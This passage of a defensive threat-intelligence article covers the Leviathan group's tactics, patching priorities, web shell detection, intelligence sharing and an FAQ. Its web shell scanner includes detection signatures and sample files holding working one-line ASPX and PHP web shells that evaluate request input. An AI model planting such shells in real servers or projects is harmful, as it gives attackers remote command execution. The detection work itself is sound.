  • Windows Management Instrumentation (WMI) for persistence
  • certutil.exe for downloading and decoding payloads
  • RDP sessions opened with harvested credentials for lateral movement

“Adversaries now spend 40% less time deploying custom malware by abusing pre-installed utilities.”

—CrowdStrike Global Threat Report

Forensic countermeasures include timestamp manipulation and log deletion. These methods complicate incident response while maintaining access to critical information.

Defensive Strategies Against Leviathan

A patch window measured in days, not weeks, has become critical in preventing breaches. Rapid response to newly disclosed vulnerabilities is what separates networks that stay protected from those that get compromised. The strategies below harden defenses against this kind of intrusion.

Patch Management and Vulnerability Mitigation

Prioritize flaws using the Common Vulnerability Scoring System (CVSS) together with exposure and known-exploitation status, not CVSS alone. Critical vulnerabilities in public-facing systems demand patching within three days, because this actor is reported to exploit new flaws within hours to days of disclosure.

Key implementation steps:

  • Automate scanning with tools like Tenable or Qualys
  • Segment networks to contain systems that cannot be patched promptly
  • Enable Windows Defender Credential Guard so that credentials cached by LSASS cannot be dumped
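Turning "CVSS plus exposure plus known exploitation, with a three-day SLA for the critical and exposed" into something a scanner export can be fed through looks like the following. It is an added example for this article, not a vendor's risk model: the CVE identifiers are ones this article cites, but the assets, the dates they were opened, the exposure flags and the scoring weights are constructed assumptions.

```python
"""Rank open vulnerability findings by exploitation risk and SLA.

Added example for this article. Weights, SLA tiers and the finding records are
assumptions for the demonstration; only the CVE identifiers are real.
"""
from datetime import datetime, timedelta

SAMPLE_FINDINGS = [
    {"asset": "confluence-01", "cve": "CVE-2023-22518", "cvss": 9.1, "exposed": True,
     "known_exploited": True, "opened": "2025-03-01"},
    {"asset": "exch-02", "cve": "CVE-2021-34473", "cvss": 9.8, "exposed": True,
     "known_exploited": True, "opened": "2025-02-20"},
    {"asset": "build-07", "cve": "CVE-2021-44228", "cvss": 10.0, "exposed": False,
     "known_exploited": True, "opened": "2025-03-03"},
    {"asset": "wiki-dev", "cve": "CVE-2021-26084", "cvss": 9.8, "exposed": False,
     "known_exploited": True, "opened": "2025-02-01"},
    {"asset": "print-03", "cve": "(vendor advisory, no CVE)", "cvss": 5.3, "exposed": False,
     "known_exploited": False, "opened": "2025-02-25"},
]
NOW = datetime(2025, 3, 5)   # constructed "today" for the demo


def sla_hours(f: dict) -> int:
    """72h for anything known-exploited or critical-and-exposed; then by severity."""
    if f["known_exploited"] or (f["cvss"] >= 9.0 and f["exposed"]):
        return 72
    if f["cvss"] >= 7.0:
        return 24 * 14
    return 24 * 30


def risk_score(f: dict) -> float:
    """CVSS, boosted for internet exposure and for confirmed in-the-wild exploitation."""
    score = f["cvss"]
    if f["exposed"]:
        score += 3
    if f["known_exploited"]:
        score += 5
    return score


def prioritize(findings, now: datetime):
    """Return findings with due date and score, overdue first, then highest score."""
    rows = []
    for f in findings:
        due = datetime.fromisoformat(f["opened"]) + timedelta(hours=sla_hours(f))
        rows.append({**f, "score": risk_score(f), "due": due, "overdue": now > due})
    rows.sort(key=lambda r: (not r["overdue"], -r["score"], r["due"]))
    return rows


def overdue_assets(findings, now: datetime):
    """Just the asset names that have blown their SLA, in priority order."""
    return [r["asset"] for r in prioritize(findings, now) if r["overdue"]]
```

Note what the ordering does with build-07: the highest CVSS on the list ranks below three lower-scored items because those are already past their SLA, and an unpatched critical on an internal build server is still a 72-hour item because the flaw is known to be exploited. The "known_exploited" flag is where a feed such as CISA's Known Exploited Vulnerabilities catalog plugs in.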

Detection of Web Shells and Anomalous Traffic

Web shell activity leaves detectable fingerprints. Establish network baselines to spot unusual data flows, then look for these indicators in HTTP logs:

Indicator          | Detection method
Unusual POST sizes | SIEM correlation rules
Random URI strings | Web application firewalls

Memory analysis helps identify fileless threats. Cloud access security brokers (CASBs) can monitor SaaS platforms for malicious activity. Honeypots provide early warning of reconnaissance attempts.
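Both indicator rows in the table, plus the China Chopper description earlier on the page, reduce to checks a defender can script against a web root and an access log. The block below is an added example for this article, not a product signature set: a content scan for the one-line "evaluate whatever the request sends" shape that China Chopper-style shells take in ASPX, PHP and JSP, and a log heuristic for script paths that only ever receive POSTs with no referer, which is how a shell client talks to its shell and how browsers do not. The file contents and log lines are constructed.

```python
"""Web shell triage: content signatures plus a POST-only path heuristic.

Added example for this article. SAMPLE_FILES and SAMPLE_LOG are constructed;
the signatures are illustrative and should be extended per stack.
"""
import re
from collections import defaultdict

# The China Chopper server side is a one-liner that evals a request parameter.
SHELL_SIGS = [
    (re.compile(r"eval\s*\(\s*Request\.Item\s*\[", re.I), "aspx-eval-request"),
    (re.compile(r"eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I), "php-eval-request"),
    (re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I), "jsp-exec-request"),
    (re.compile(r"base64_decode\s*\(\s*\$_(?:POST|REQUEST)", re.I), "php-b64-eval"),
]
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".php", ".jsp")


def scan_file_content(content: str) -> list:
    """Return signature labels; tiny files that eval input get an extra flag."""
    hits = [label for rx, label in SHELL_SIGS if rx.search(content)]
    if hits and len(content) < 512:
        hits.append("tiny-file")
    return hits


def scan_webroot(files: dict) -> dict:
    """files: {relative path: content}. Returns only the paths with findings."""
    return {name: h for name, c in files.items() if name.lower().endswith(SCRIPT_EXTS) and (h := scan_file_content(c))}


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+|-) "(?P<ref>[^"]*)"'
)


def post_only_paths(lines, min_posts: int = 3) -> list:
    """Script paths that see POSTs, never a GET, and never arrive via a referer."""
    methods, posts, refs = defaultdict(set), defaultdict(int), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?")[0]
        if not path.lower().endswith(SCRIPT_EXTS):
            continue
        methods[path].add(m.group("method"))
        if m.group("method") == "POST":
            posts[path] += 1
        if m.group("ref") != "-":
            refs[path].add(m.group("ref"))
    return sorted(p for p in posts if methods[p] == {"POST"} and posts[p] >= min_posts and not refs[p])


SAMPLE_FILES = {
    "aspnet_client/iisstart.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "uploads/login.php": "<?php @eval($_POST['cmd']); ?>",
    "index.php": "<?php echo 'ok'; ?>",
    "static/app.js": "eval(window.name)",   # not a server script; ignored
}
SAMPLE_LOG = [
    '203.0.113.9 - - [04/Mar/2025:11:20:01 +0000] "POST /aspnet_client/iisstart.aspx HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Mar/2025:11:20:05 +0000] "POST /aspnet_client/iisstart.aspx HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Mar/2025:11:21:40 +0000] "POST /aspnet_client/iisstart.aspx HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.0.2.40 - - [04/Mar/2025:11:22:00 +0000] "GET /login.aspx HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.40 - - [04/Mar/2025:11:22:09 +0000] "POST /login.aspx HTTP/1.1" 302 0 "https://portal.example/login.aspx" "Mozilla/5.0"',
    '192.0.2.41 - - [04/Mar/2025:11:23:00 +0000] "POST /api/submit.php HTTP/1.1" 200 12 "https://portal.example/form" "Mozilla/5.0"',
    '192.0.2.42 - - [04/Mar/2025:11:23:30 +0000] "POST /api/submit.php HTTP/1.1" 200 12 "https://portal.example/form" "Mozilla/5.0"',
    '192.0.2.43 - - [04/Mar/2025:11:24:00 +0000] "POST /api/submit.php HTTP/1.1" 200 12 "https://portal.example/form" "Mozilla/5.0"',
]
```

The two checks are complementary: the content scan finds the shell once you know which server to look at, while the log heuristic points at the server, since a freshly dropped shell is typically the only script on the host whose entire traffic history is POSTs from one or two addresses. Comparing script file modification times against the last deployment is the cheap third check.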

“Organizations detecting web shells within 48 hours reduce dwell time by 91% compared to those finding them weeks later.”

—SANS Institute Incident Response Survey

Combine these approaches for comprehensive protection. Regular red team exercises test defensive readiness against real-world tactics.

Industry Collaboration and Threat Intelligence Sharing

No single organization can combat advanced cyber threats alone—partnerships are essential. The cybersecurity community thrives when information flows freely between researchers, corporations, and government agencies. This collective defense approach has proven effective against sophisticated digital adversaries.

Cybersecurity Firms as Force Multipliers

Leading security vendors collaborate through platforms like MISP (Malware Information Sharing Platform & Threat Sharing). These systems integrate feeds from many threat intelligence providers into one picture of the threat landscape. Key initiatives include:

  • Automated STIX/TAXII feed integration for real-time indicator sharing
  • Dark web monitoring collectives tracking emerging tools
  • Joint analysis of malware samples across vendor sandboxes

ISACs (Information Sharing and Analysis Centers) set participation standards for members. These groups ensure sensitive data reaches those who need it most while maintaining confidentiality.

Public-Private Defense Networks

Government agencies now actively exchange threat data with critical infrastructure operators. The FBI’s InfraGard program exemplifies this model, with notable successes including:

Initiative                        | Impact
Cross-sector IOC databases        | Reduced breach identification time by 68%
Joint incident response playbooks | Standardized containment procedures

“Legal frameworks like the Cybersecurity Information Sharing Act have removed barriers that once hindered collaboration.”

—Department of Homeland Security Report

Attribution remains challenging, but shared analysis has improved pattern recognition. When cloud providers, telecom companies, and financial institutions pool resources, they create early warning systems no single entity could build alone.

Future Projections for Leviathan’s Activities

Artificial intelligence is reshaping digital warfare, creating both risks and opportunities. As defensive systems advance, so do offensive capabilities—particularly in automated social engineering. We’re witnessing the dawn of AI-powered phishing tools that craft personalized lures by analyzing public profiles and writing styles.

Next-Generation Attack Surfaces

5G networks introduce new exploitation vectors through network slicing vulnerabilities. Attackers could isolate critical communications or manipulate IoT device clusters. Satellite systems are becoming prime targets too, with demonstrated risks to global positioning infrastructure.

Cyber-physical system risks escalate as operational technology converges with IT networks. Recent studies show:

  • Manufacturing plants face sharply rising intrusion attempts
  • Power grid control systems lack sufficient air-gapping
  • Autonomous vehicle networks show protocol weaknesses

Evolving Defense Paradigms

Cloud-native security toolkits are emerging to counter these threats. They leverage machine learning to detect anomalies in real-time across distributed systems. Quantum-resistant encryption standards are also in development, anticipating future computational capabilities.

“The next five years will demand security architectures that protect against threats we can’t yet fully characterize.”

—MITRE Emerging Technologies Center

Supply chain attacks will likely increase, targeting software dependencies and hardware components. Defense strategies must evolve beyond perimeter protection to holistic ecosystem monitoring. Continuous threat modeling becomes essential as attack surfaces expand into space and quantum domains.

Conclusion

Protecting digital assets requires understanding evolving cyber risks and adapting defenses accordingly. We must recognize patterns in malicious activity while strengthening critical systems.

Continuous monitoring helps detect emerging threats before damage occurs. Intelligence-led approaches combine technology with human analysis for better protection.

Global cooperation between public and private groups enhances our collective resilience. Sharing actionable data improves response times across industries.

Implementing zero-trust frameworks and workforce training boosts security postures. Regular assessments ensure defenses match current risks.

By combining these strategies, we build layered protection against sophisticated operations. Staying proactive is our best defense in this dynamic landscape.

FAQ

What industries does Leviathan primarily target?

The group focuses on government agencies, defense contractors, and critical infrastructure sectors like energy and telecommunications. They also attack financial institutions and technology firms.

How does Leviathan gain initial access to systems?

They often use spear-phishing emails with malicious attachments or exploit public-facing vulnerabilities in web applications. Tools like Cobalt Strike and China Chopper help establish footholds.

What malware does Leviathan commonly deploy?

Their arsenal includes custom malware like AIRBREAK and BADFLICK, alongside publicly available tools such as Gh0st RAT. Web shells like China Chopper enable persistent remote access.

What tactics does Leviathan use for lateral movement?

They abuse Windows scripting interpreters, dump credentials using Mimikatz, and escalate privileges to move across networks. Compromised admin accounts help them expand control.

How does Leviathan exfiltrate stolen data?

They hide information in images using steganography, upload files to cloud storage, or tunnel data through multiple proxies to evade detection.

What vulnerabilities has Leviathan exploited recently?

Log4J, Microsoft Exchange flaws, and Atlassian Confluence bugs are among their top targets. They quickly weaponize public exploits for attacks.

How can organizations defend against Leviathan?

Patch management, network traffic monitoring, and web shell detection are critical. Implementing multi-factor authentication limits credential misuse.

Does Leviathan collaborate with other threat actors?

The group itself is assessed to be state-sponsored, operating for the MSS through Hainan-based contractors, and it is tracked as a distinct cluster. Names such as Bronze Mohawk are other vendors' aliases for the same group, not separate actors, although its tooling does overlap with other China-nexus groups.

What social engineering tactics does Leviathan employ?

Fake login pages, impersonation of trusted contacts, and hijacked social media accounts help them trick victims into revealing credentials.

How is threat intelligence shared about Leviathan?

Cybersecurity firms like Mandiant track their campaigns, while government agencies issue advisories. Private-sector partnerships improve collective defense.
